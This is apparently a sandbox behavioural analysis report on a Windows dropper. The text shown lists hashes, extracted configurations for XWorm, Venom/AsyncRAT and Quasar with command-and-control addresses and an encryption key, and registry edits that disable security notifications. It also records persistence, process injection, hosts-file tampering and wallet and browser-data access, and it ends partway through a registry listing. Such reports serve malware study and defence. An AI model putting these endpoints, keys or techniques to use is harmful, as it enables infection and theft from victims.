Resubmissions
18-09-2024 16:12
240918-tnhy5a1cmp 1016-08-2024 04:34
240816-e7ba3azckk 1016-08-2024 04:25
240816-e14zssyhpq 1016-08-2024 04:25
240816-e1x69ayhpk 315-08-2024 21:56
240815-1tbkka1fpq 1015-08-2024 21:47
240815-1nkw2swfre 1015-08-2024 21:46
240815-1m318s1cpr 315-08-2024 21:46
240815-1mkvnawflb 1013-08-2024 22:28
240813-2dvtyazbph 1025-06-2024 11:24
240625-nhwp5swhja 10Analysis
-
max time kernel
150s -
max time network
151s -
platform
windows10-2004_x64 -
resource
win10v2004-20240426-en -
resource tags
arch:x64arch:x86image:win10v2004-20240426-enlocale:en-usos:windows10-2004-x64system -
submitted
22-05-2024 09:14
Static task
static1
Behavioral task
behavioral1
Sample
4363463463464363463463463.exe
Resource
win7-20240508-en
Behavioral task
behavioral2
Sample
4363463463464363463463463.exe
Resource
win10v2004-20240426-en
Behavioral task
behavioral3
Sample
New Text Document mod.exe
Resource
win7-20240221-en
Behavioral task
behavioral4
Sample
New Text Document mod.exe
Resource
win10v2004-20240426-en
General
-
Target
New Text Document mod.exe
-
Size
8KB
-
MD5
69994ff2f00eeca9335ccd502198e05b
-
SHA1
b13a15a5bea65b711b835ce8eccd2a699a99cead
-
SHA256
2e2e035ece4accdee838ecaacdc263fa526939597954d18d1320d73c8bf810c2
-
SHA512
ced53147894ed2dfc980bcb50767d9734ba8021f85842a53bb4bb4c502d51b4e9884f5f74c4dd2b70b53cafbe2441376675f7bd0f19bb20a3becb091a34fb9f3
-
SSDEEP
96:y7ov9wc1dN1Unh3EHJ40CUJCrQt0LpCBIW12nEtgpH9GIkQYQoBNw9fnmK5iLjTv:yZyTFJfCB20LsBIW12n/eIkQ2BNg5S1
Malware Config
Extracted
https://d22hce23hy1ej9.cloudfront.net/load/th.php?a=2836&c=1002
Extracted
xworm
5.0
85.203.4.146:7000
eItTbYBfBYihwkyW
-
Install_directory
%Userprofile%
-
install_file
svchost.exe
Extracted
asyncrat
Venom RAT + HVNC + Stealer + Grabber v6.0.2
Default
85.209.133.18:4545
tdipywykihsjieff
-
delay
1
-
install
false
-
install_folder
%AppData%
Extracted
quasar
1.4.1
Office04
79.132.193.215:4782
f99ccef5-65c4-4972-adf2-fb38921cc9fc
-
encryption_key
1C15E91ACCFAC60B043A1336CF6912EA8572BA83
-
install_name
Client.exe
-
log_directory
Logs
-
reconnect_delay
3000
-
startup_key
Quasar Client Startup
Signatures
-
Detect Xworm Payload 2 IoCs
Processes:
resource yara_rule C:\Users\Admin\AppData\Local\Temp\a\svchost.exe family_xworm behavioral6/memory/6100-5936-0x0000000000420000-0x0000000000430000-memory.dmp family_xworm -
Modifies security service 2 TTPs 2 IoCs
Processes:
sysblardsv.exesyslmgrsvc.exedescription ioc process Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Start = "4" sysblardsv.exe Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Start = "4" syslmgrsvc.exe -
Quasar payload 2 IoCs
Processes:
resource yara_rule C:\Users\Admin\AppData\Local\Temp\a\client.exe family_quasar behavioral6/memory/8168-16123-0x0000000000DF0000-0x0000000001114000-memory.dmp family_quasar -
Processes:
syslmgrsvc.exewinqlsdrvcs.exesysblardsv.exedescription ioc process Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\UpdatesOverride = "1" syslmgrsvc.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\FirewallOverride = "1" winqlsdrvcs.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\UpdatesDisableNotify = "1" winqlsdrvcs.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\UpdatesDisableNotify = "1" sysblardsv.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\AntiVirusDisableNotify = "1" syslmgrsvc.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\FirewallDisableNotify = "1" syslmgrsvc.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\AntiVirusDisableNotify = "1" sysblardsv.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\AntiVirusOverride = "1" winqlsdrvcs.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\UpdatesOverride = "1" winqlsdrvcs.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\FirewallDisableNotify = "1" sysblardsv.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\AntiVirusOverride = "1" sysblardsv.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\UpdatesOverride = "1" sysblardsv.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\FirewallOverride = "1" syslmgrsvc.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\AntiVirusOverride = "1" syslmgrsvc.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\UpdatesDisableNotify = "1" syslmgrsvc.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\FirewallDisableNotify = "1" winqlsdrvcs.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\AntiVirusDisableNotify = "1" winqlsdrvcs.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\FirewallOverride = "1" sysblardsv.exe -
Async RAT payload 1 IoCs
Processes:
resource yara_rule C:\Users\Admin\AppData\Local\Temp\a\win1.exe family_asyncrat -
Blocklisted process makes network request 1 IoCs
Processes:
powershell.exeflow pid process 188 7488 powershell.exe -
Processes:
powershell.exepowershell.exepowershell.exepowershell.exepid process 5560 powershell.exe 7488 powershell.exe 1168 powershell.exe 6488 powershell.exe -
Creates new service(s) 2 TTPs
-
Downloads MZ/PE file
-
Drops file in Drivers directory 2 IoCs
Processes:
print.exeupdater.exedescription ioc process File created C:\Windows\system32\drivers\etc\hosts print.exe File created C:\Windows\system32\drivers\etc\hosts updater.exe -
Possible privilege escalation attempt 2 IoCs
Processes:
takeown.exeicacls.exepid process 6332 takeown.exe 6156 icacls.exe -
Checks computer location settings 2 TTPs 8 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
output.exeoiii.execonhost.exeinte.exe222.exePirate_24S.exeWScript.exeNew Text Document mod.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-4018855536-2201274732-320770143-1000\Control Panel\International\Geo\Nation output.exe Key value queried \REGISTRY\USER\S-1-5-21-4018855536-2201274732-320770143-1000\Control Panel\International\Geo\Nation oiii.exe Key value queried \REGISTRY\USER\S-1-5-21-4018855536-2201274732-320770143-1000\Control Panel\International\Geo\Nation conhost.exe Key value queried \REGISTRY\USER\S-1-5-21-4018855536-2201274732-320770143-1000\Control Panel\International\Geo\Nation inte.exe Key value queried \REGISTRY\USER\S-1-5-21-4018855536-2201274732-320770143-1000\Control Panel\International\Geo\Nation 222.exe Key value queried \REGISTRY\USER\S-1-5-21-4018855536-2201274732-320770143-1000\Control Panel\International\Geo\Nation Pirate_24S.exe Key value queried \REGISTRY\USER\S-1-5-21-4018855536-2201274732-320770143-1000\Control Panel\International\Geo\Nation WScript.exe Key value queried \REGISTRY\USER\S-1-5-21-4018855536-2201274732-320770143-1000\Control Panel\International\Geo\Nation New Text Document mod.exe -
Drops startup file 2 IoCs
Processes:
svchost.exedescription ioc process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svchost.lnk svchost.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svchost.lnk svchost.exe -
Executes dropped EXE 59 IoCs
Processes:
xin.exeeagleget-2-1-6-50.exeAntiVirus2.exeSetup.exesvchost.exewin1.exeoutput.exeSIG.EXEalabi.execrt.execrt.tmpsoundermidiplayer.exesoundermidiplayer.exeoiii.exewmpnetwk.exewmixedwk.execonhost.exesdf34ert3etgrthrthfghfghjfgh.exe7z.exe7z.exe7z.exekatD433.tmpsvcshost.exeo2i3jroi23joj23ikrjokij3oroi.exeinte.exekatDA1F.tmpvpn-1002.exetdrpload.exeprint.exesysblardsv.exe222.exe7z.exe7z.exe7z.exe7z.exe7z.exe7z.exe7z.exe7z.exe7z.exeInstaller.exePirate_24S.exeupdater.exe270914205.exesyslmgrsvc.exeadwmbjfsmbak.execlient.exeClient.exe2328932319.exereverse.exe64.exewinqlsdrvcs.exe744220930.exe1346524297.exe2466314816.exeWindows Security Upgrade Service.exe1679313164.exe2269015714.exe1202339053.exepid process 4436 xin.exe 3256 eagleget-2-1-6-50.exe 4304 AntiVirus2.exe 6532 Setup.exe 6100 svchost.exe 4392 win1.exe 2360 output.exe 5488 SIG.EXE 6476 alabi.exe 5168 crt.exe 6896 crt.tmp 5500 soundermidiplayer.exe 3456 soundermidiplayer.exe 860 oiii.exe 6412 wmpnetwk.exe 5892 wmixedwk.exe 6316 conhost.exe 6644 sdf34ert3etgrthrthfghfghjfgh.exe 5136 7z.exe 6800 7z.exe 6668 7z.exe 7472 katD433.tmp 3272 svcshost.exe 3776 o2i3jroi23joj23ikrjokij3oroi.exe 5268 inte.exe 2248 katDA1F.tmp 5328 vpn-1002.exe 4568 tdrpload.exe 7136 print.exe 368 sysblardsv.exe 1420 222.exe 2556 7z.exe 7756 7z.exe 6008 7z.exe 5916 7z.exe 5216 7z.exe 4476 7z.exe 7628 7z.exe 7216 7z.exe 5256 7z.exe 6256 Installer.exe 7432 Pirate_24S.exe 7184 updater.exe 6772 270914205.exe 7484 syslmgrsvc.exe 5776 adwmbjfsmbak.exe 8168 client.exe 1680 Client.exe 6192 2328932319.exe 2144 reverse.exe 5504 64.exe 216 winqlsdrvcs.exe 3328 744220930.exe 6208 1346524297.exe 4328 2466314816.exe 760 Windows Security Upgrade Service.exe 7860 1679313164.exe 6424 2269015714.exe 6728 1202339053.exe -
Loads dropped DLL 20 IoCs
Processes:
xin.execrt.tmpFUT.au3wmpnetwk.exewmixedwk.exe7z.exe7z.exe7z.exevpn-1002.exe7z.exe7z.exe7z.exe7z.exe7z.exe7z.exe7z.exe7z.exe7z.exepid process 4436 xin.exe 6896 crt.tmp 6896 crt.tmp 6896 crt.tmp 5608 FUT.au3 6412 wmpnetwk.exe 5892 wmixedwk.exe 5136 7z.exe 6800 7z.exe 6668 7z.exe 5328 vpn-1002.exe 2556 7z.exe 7756 7z.exe 6008 7z.exe 5916 7z.exe 5216 7z.exe 4476 7z.exe 7628 7z.exe 7216 7z.exe 5256 7z.exe -
Modifies file permissions 1 TTPs 2 IoCs
Processes:
takeown.exeicacls.exepid process 6332 takeown.exe 6156 icacls.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Processes:
sysblardsv.exesyslmgrsvc.exewinqlsdrvcs.exedescription ioc process Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\FirewallOverride = "1" sysblardsv.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\FirewallOverride = "1" syslmgrsvc.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\FirewallDisableNotify = "1" syslmgrsvc.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\FirewallDisableNotify = "1" winqlsdrvcs.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\AntiVirusDisableNotify = "1" winqlsdrvcs.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\AntiVirusOverride = "1" sysblardsv.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\AntiVirusOverride = "1" winqlsdrvcs.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\UpdatesDisableNotify = "1" winqlsdrvcs.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\AntiSpywareOverride = "1" sysblardsv.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\UpdatesDisableNotify = "1" sysblardsv.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\AntiSpywareOverride = "1" syslmgrsvc.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\UpdatesOverride = "1" syslmgrsvc.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\UpdatesDisableNotify = "1" syslmgrsvc.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\FirewallOverride = "1" winqlsdrvcs.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\UpdatesOverride = "1" winqlsdrvcs.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\FirewallDisableNotify = "1" sysblardsv.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\AntiVirusDisableNotify = "1" sysblardsv.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\UpdatesOverride = "1" sysblardsv.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\AntiVirusOverride = "1" syslmgrsvc.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\AntiVirusDisableNotify = "1" syslmgrsvc.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\AntiSpywareOverride = "1" winqlsdrvcs.exe -
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 4 IoCs
Processes:
SIG.EXEtdrpload.exe270914205.exe2328932319.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-4018855536-2201274732-320770143-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\SmokeUnity = "C:\\Users\\Admin\\Documents\\Mochacha\\NaturalValue.exe" SIG.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Windows Settings = "C:\\Windows\\sysblardsv.exe" tdrpload.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Windows Settings = "C:\\Windows\\syslmgrsvc.exe" 270914205.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Windows Service = "C:\\Windows\\winqlsdrvcs.exe" 2328932319.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs 4 IoCs
Processes:
flow ioc 182 pastebin.com 39 raw.githubusercontent.com 40 raw.githubusercontent.com 181 pastebin.com -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow ioc 57 ip-api.com -
Drops file in System32 directory 11 IoCs
Processes:
svchost.execlient.exepowershell.exesvchost.exesvchost.exeInstaller.exeadwmbjfsmbak.exesvchost.exedescription ioc process File opened for modification C:\Windows\System32\config\systemprofile\AppData\Local\7936.hecate svchost.exe File opened for modification C:\Windows\system32\Client.exe client.exe File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log powershell.exe File opened for modification C:\Windows\System32\config\systemprofile\AppData\Local\5488.hecate svchost.exe File opened for modification C:\Windows\System32\config\systemprofile\AppData\Local\info svchost.exe File opened for modification C:\Windows\System32\config\systemprofile\AppData\Local\3736.hecate svchost.exe File opened for modification C:\Windows\system32\MRT.exe Installer.exe File created C:\Windows\system32\Client.exe client.exe File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File opened for modification C:\Windows\system32\MRT.exe adwmbjfsmbak.exe File opened for modification C:\Windows\System32\config\systemprofile\AppData\Local\3380.hecate svchost.exe -
Suspicious use of SetThreadContext 35 IoCs
Processes:
xin.exeSetup.exeSIG.EXEwmixedwk.exesvchost.exesdf34ert3etgrthrthfghfghjfgh.exeo2i3jroi23joj23ikrjokij3oroi.exeupdater.exeadwmbjfsmbak.exedescription pid process target process PID 4436 set thread context of 6520 4436 xin.exe MsBuild.exe PID 6532 set thread context of 5964 6532 Setup.exe comp.exe PID 5488 set thread context of 6928 5488 SIG.EXE csc.exe PID 5892 set thread context of 6880 5892 wmixedwk.exe svchost.exe PID 6880 set thread context of 5488 6880 svchost.exe svchost.exe PID 6880 set thread context of 1196 6880 svchost.exe svchost.exe PID 6880 set thread context of 7936 6880 svchost.exe svchost.exe PID 6880 set thread context of 7616 6880 svchost.exe svchost.exe PID 6880 set thread context of 7700 6880 svchost.exe svchost.exe PID 6880 set thread context of 6908 6880 svchost.exe svchost.exe PID 6644 set thread context of 7472 6644 sdf34ert3etgrthrthfghfghjfgh.exe katD433.tmp PID 6880 set thread context of 3744 6880 svchost.exe svchost.exe PID 3776 set thread context of 2248 3776 o2i3jroi23joj23ikrjokij3oroi.exe katDA1F.tmp PID 6880 set thread context of 4580 6880 svchost.exe svchost.exe PID 6880 set thread context of 7856 6880 svchost.exe svchost.exe PID 6880 set thread context of 1680 6880 svchost.exe svchost.exe PID 6880 set thread context of 5996 6880 svchost.exe svchost.exe PID 7184 set thread context of 6068 7184 updater.exe conhost.exe PID 7184 set thread context of 5964 7184 updater.exe conhost.exe PID 6880 set thread context of 8136 6880 svchost.exe svchost.exe PID 6880 set thread context of 7576 6880 svchost.exe svchost.exe PID 6880 set thread context of 3736 6880 svchost.exe svchost.exe PID 6880 set thread context of 6728 6880 svchost.exe svchost.exe PID 6880 set thread context of 5828 6880 svchost.exe svchost.exe PID 6880 set thread context of 3968 6880 svchost.exe svchost.exe PID 5776 set thread context of 5704 5776 adwmbjfsmbak.exe conhost.exe PID 5776 set thread context of 5756 5776 adwmbjfsmbak.exe explorer.exe PID 6880 set thread context of 2736 6880 svchost.exe svchost.exe PID 6880 set thread context of 3624 6880 svchost.exe svchost.exe PID 6880 set thread context of 2148 6880 svchost.exe svchost.exe PID 6880 set thread context of 1980 6880 svchost.exe svchost.exe PID 6880 set thread context of 3920 6880 svchost.exe svchost.exe PID 6880 set thread context of 1280 6880 svchost.exe svchost.exe PID 6880 set thread context of 3652 6880 svchost.exe svchost.exe PID 6880 set thread context of 3380 6880 svchost.exe svchost.exe -
Drops file in Program Files directory 32 IoCs
Processes:
oiii.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exedescription ioc process File opened for modification C:\Program Files\Windows Media Player\wmixedwk.exe oiii.exe File opened for modification C:\Program Files\Windows Media Player\mpsvc.dll svchost.exe File opened for modification C:\Program Files\Windows Media Player\ppqqxpb svchost.exe File opened for modification C:\Program Files\Windows Media Player\ppqqxpb svchost.exe File opened for modification C:\Program Files\Windows Media Player\ppqqxpb svchost.exe File created C:\Program Files\Windows Media Player\mpsvc.dll oiii.exe File created C:\Program Files\Windows Media Player\wmpnetwk.exe oiii.exe File opened for modification C:\Program Files\Windows Media Player\ppqqxpb svchost.exe File opened for modification C:\Program Files\Windows Media Player\ppqqxpb svchost.exe File opened for modification C:\Program Files\Windows Media Player\ppqqxpb svchost.exe File opened for modification C:\Program Files\Windows Media Player\ppqqxpa svchost.exe File opened for modification C:\Program Files\Windows Media Player\ppqqxpb svchost.exe File opened for modification C:\Program Files\Windows Media Player\ppqqxpb svchost.exe File opened for modification C:\Program Files\Windows Media Player\ppqqxpb svchost.exe File opened for modification C:\Program Files\Windows Media Player\ppqqxpb svchost.exe File opened for modification C:\Program Files\Windows Media Player\ppqqxpb svchost.exe File opened for modification C:\Program Files\Windows Media Player\ppqqxpb svchost.exe File opened for modification C:\Program Files\Windows Media Player\ppqqxpb svchost.exe File opened for modification C:\Program Files\Windows Media Player\ppqqxpb svchost.exe File opened for modification C:\Program Files\Windows Media Player\ppqqxpb svchost.exe File opened for modification C:\Program Files\Windows Media Player\ppqqxpb svchost.exe File opened for modification C:\Program Files\Windows Media Player\ppqqxpb svchost.exe File opened for modification C:\Program Files\Windows Media Player\ppqqxds svchost.exe File opened for modification C:\Program Files\Windows Media Player\ppqqxpp svchost.exe File opened for modification C:\Program Files\Windows Media Player\ppqqxpb svchost.exe File created C:\Program Files\Windows Media Player\wmixedwk.exe oiii.exe File opened for modification C:\Program Files\Windows Media Player\ppqqxpb svchost.exe File opened for modification C:\Program Files\Windows Media Player\ppqqxpb svchost.exe File opened for modification C:\Program Files\Windows Media Player\ppqqxpb svchost.exe File opened for modification C:\Program Files\Windows Media Player\ppqqxpb svchost.exe File created C:\Program Files\Windows Media Player\background.jpg oiii.exe File opened for modification C:\Program Files\Windows Media Player\ppqqxpb svchost.exe -
Drops file in Windows directory 6 IoCs
Processes:
tdrpload.exe270914205.exe2328932319.exedescription ioc process File created C:\Windows\sysblardsv.exe tdrpload.exe File opened for modification C:\Windows\sysblardsv.exe tdrpload.exe File created C:\Windows\syslmgrsvc.exe 270914205.exe File opened for modification C:\Windows\syslmgrsvc.exe 270914205.exe File created C:\Windows\winqlsdrvcs.exe 2328932319.exe File opened for modification C:\Windows\winqlsdrvcs.exe 2328932319.exe -
Launches sc.exe 9 IoCs
Sc.exe is a Windows utlilty to control services on the system.
Processes:
sc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exepid process 3464 sc.exe 7876 sc.exe 5816 sc.exe 4384 sc.exe 5760 sc.exe 7588 sc.exe 6164 sc.exe 2648 sc.exe 1456 sc.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 1 IoCs
Processes:
WerFault.exepid pid_target process target process 5324 4436 WerFault.exe xin.exe -
Checks processor information in registry 2 TTPs 3 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
AcroRd32.exeFUT.au3description ioc process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 AcroRd32.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz AcroRd32.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString FUT.au3 -
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Kills process with taskkill 1 IoCs
Processes:
taskkill.exepid process 7048 taskkill.exe -
Processes:
AcroRd32.exedescription ioc process Key created \REGISTRY\USER\S-1-5-21-4018855536-2201274732-320770143-1000\SOFTWARE\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION AcroRd32.exe -
Modifies data under HKEY_USERS 64 IoCs
Processes:
SearchProtocolHost.exeSearchIndexer.exepowershell.exeSearchFilterHost.exesvchost.exedescription ioc process Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\@C:\Windows\System32\ieframe.dll,-914 = "SVG Document" SearchProtocolHost.exe Set value (data) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached\{E46787A1-4629-4423-A693-BE1F003B2742} {886D8EEB-8CF2-4446-8D02-CDBA1DBDCF99} 0xFFFF = 0100000000000000ab5fc8a628acda01 SearchProtocolHost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.svg\OpenWithList SearchProtocolHost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts SearchProtocolHost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.pdf SearchProtocolHost.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32,@elscore.dll,-3 = "Microsoft Traditional Chinese to Simplified Chinese Transliteration" SearchIndexer.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft SearchProtocolHost.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32,@elscore.dll,-8 = "Microsoft Malayalam to Latin Transliteration" SearchIndexer.exe Set value (data) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached\{C120DE80-FDE4-49F5-A713-E902EF062B8A} {886D8EEB-8CF2-4446-8D02-CDBA1DBDCF99} 0xFFFF = 010000000000000098a082a728acda01 SearchProtocolHost.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\@C:\Program Files\Microsoft Office\Root\VFS\ProgramFilesCommonX86\Microsoft Shared\Office16\oregres.dll,-170 = "Microsoft PowerPoint 97-2003 Presentation" SearchProtocolHost.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\@C:\Program Files\Microsoft Office\Root\VFS\ProgramFilesCommonX86\Microsoft Shared\Office16\oregres.dll,-142 = "Microsoft OneNote Table Of Contents" SearchProtocolHost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32,@elscore.dll,-5 = "Microsoft Transliteration Engine" SearchIndexer.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.html\OpenWithList SearchProtocolHost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\@C:\Program Files\Microsoft Office\Root\VFS\ProgramFilesCommonX86\Microsoft Shared\Office16\oregres.dll,-127 = "OpenDocument Text" SearchProtocolHost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.xht SearchProtocolHost.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\@C:\Program Files\Microsoft Office\Root\VFS\ProgramFilesCommonX86\Microsoft Shared\Office16\oregres.dll,-172 = "Microsoft PowerPoint 97-2003 Slide Show" SearchProtocolHost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\@C:\Program Files\Microsoft Office\Root\VFS\ProgramFilesCommonX86\Microsoft Shared\Office16\oregres.dll,-116 = "Microsoft Excel Template" SearchProtocolHost.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\@C:\Windows\system32\unregmp2.exe,-9934 = "AVCHD Video" SearchProtocolHost.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\@C:\Windows\system32\unregmp2.exe,-9923 = "Windows Media playlist" SearchProtocolHost.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\@C:\Windows\System32\ieframe.dll,-24585 = "Cascading Style Sheet Document" SearchProtocolHost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer SearchProtocolHost.exe Set value (data) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached\{487BA7B8-4DB0-465F-B122-C74A445A095D} {886D8EEB-8CF2-4446-8D02-CDBA1DBDCF99} 0xFFFF = 0100000000000000fe6f19a728acda01 SearchProtocolHost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows SearchProtocolHost.exe Set value (data) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached\{5985FC23-2588-4D9A-B38B-7E7AFFAB3155} {886D8EEB-8CF2-4446-8D02-CDBA1DBDCF99} 0xFFFF = 